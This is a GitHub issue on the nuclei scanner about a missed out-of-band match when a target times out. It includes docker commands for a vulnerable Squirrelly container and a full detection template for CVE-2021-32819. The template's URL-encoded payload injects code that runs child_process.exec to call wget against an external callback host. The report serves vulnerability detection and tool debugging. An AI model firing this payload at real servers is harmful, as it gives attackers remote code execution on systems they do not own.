### ISSUE TITLE
Missing Interactsh Interaction upon timeout

### ISSUE THREAD

**Issue by ehsandeep** [projectdiscovery/nuclei#969]
**Describe the bug**
For the case, when the target timed out after exploit execution, nuclei miss a valid match even we get the Interactsh Interaction.

**Nuclei version**
`2.4.3`

Steps to replicate this behavior:

Vulnerable environment:

```
docker pull vultarget/node_squirrelly_rce-cve_2021_32819:8.0.8
docker run -it -d -p 9999:3000 vultarget/node_squirrelly_rce-cve_2021_32819:8.0.8
```

<details>
<summary>Exploit Template</summary>

```yaml
id: CVE-2021-32819

info:
  name: Nodejs squirrelly template engine RCE
  author: pikpikcu
  severity: critical
  description: |
    Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
    options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
    currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
    - https://www.linuxlz.com/aqld/2331.html
    - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
  tags: cve,cve2021,nodejs,rce,oob

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
```
</details>

```
nuclei -t exploit.yaml -u http://localhost:3000
```

Even the exploit works and execute `wget http://{{interactsh-url}}`, but as the request gets timed (expected), nuclei discard the result.
